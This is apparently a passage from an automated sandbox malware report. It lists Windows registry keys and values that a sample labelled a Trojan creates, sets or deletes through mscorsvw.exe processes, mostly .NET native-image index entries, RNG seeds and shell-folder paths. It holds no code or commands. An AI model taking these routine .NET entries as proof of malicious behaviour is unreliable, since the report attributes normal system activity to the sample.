[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\643db07b\27\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
"ConfigMask" = "4361"
"MVID" = "93 92 67 97 48 6D 4F 7A 9B 69 C5 87 5F F3 FC 30"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ConfigString" = "ZAP--0000-0000"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"LastModTime" = "F2 7F EE 96 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\43970528\4b\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\56d30baa\41c113e9]
"5d" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 0B EE 2E BC AD 96 06 46 3B 26 84 2A AB 5C 46"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"SIG" = "EF D0 54 19 D0 F5 86 44 A9 62 4E 86 6A 5F 6C 6E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "93"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
The process mscorsvw.exe:2872 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 8A D9 37 ED C9 37 10 A1 65 92 FB A0 EB DC 46"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:3832 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"DisplayName" = "Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\3fa824d2\11\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"MVID" = "EA F7 7E C3 AE 2E A1 73 83 BF A6 FB A9 3D 37 37"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF 2E 99 F9 6E 23 22 F6 0C 1E C1 DC 28 5C D6 3E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "97"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\3ef4663b\f\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"SIG" = "7B 5D F0 E6 43 C6 6F 48 85 FF C5 61 E9 E4 D2 1B"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"DisplayName" = "Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"LastModTime" = "1E E0 20 9C CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
The process mscorsvw.exe:3872 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 78 59 96 55 F8 F6 E6 62 78 0A 2C 8B 95 4D 0E"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:304 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "61 BB 62 C1 60 3B 1E 54 2C 47 CF 4B 3A F7 FF E9"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"LastModTime" = "54 91 20 97 CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"DisplayName" = "Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"MVID" = "AB 6E A2 EF 90 77 0C 78 07 DB 52 DB 59 B5 A1 32"
"Status" = "0"
"DisplayName" = "Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2995e574\9\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 96 46 4C 1A DA 27 42 2E 43 8E CA A9 72 4B 03"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "98"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"SIG" = "07 95 68 2E 6D 23 41 45 81 DB 7F 93 51 3C 97 66"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]
The process mscorsvw.exe:1556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"DisplayName" = "Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\51be0150\645507bd\5d\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\268e923b\24\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FD"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ConfigMask" = "4361"
"MVID" = "72 A5 E7 88 C4 07 6B 67 EC 68 97 DA DB 9C 00 B6"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FD"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 4D 5B 62 51 0B D5 0C 9F 03 9B 98 20 66 19 2D"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"DisplayName" = "Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"LastModTime" = "18 68 49 9C CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"SIG" = "EC 74 C4 48 ED 80 64 4D BD A4 D7 78 32 8C 96 D8"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "95"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
The process mscorsvw.exe:2536 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"SIG" = "B7 6F 43 3B 5E 11 DE 4E B3 DF 75 E5 9F 64 67 8F"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\67e63d5c\6\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FD"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"ConfigMask" = "4361"
"ConfigString" = "ZAP--0000-0000"
"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"DisplayName" = "Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"LastModTime" = "B8 8D 6F 9C CA AB D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"DisplayName" = "Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FD"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 13 BB A4 3C DC E6 A0 68 6A F5 45 E8 8D 1A C9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"MVID" = "BE 89 7C E6 CB 7D 25 17 02 86 EA BC EA E9 F4 1E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\67e63d5c\6\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\268e923b\24\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "96"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
The process mscorsvw.exe:2000 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
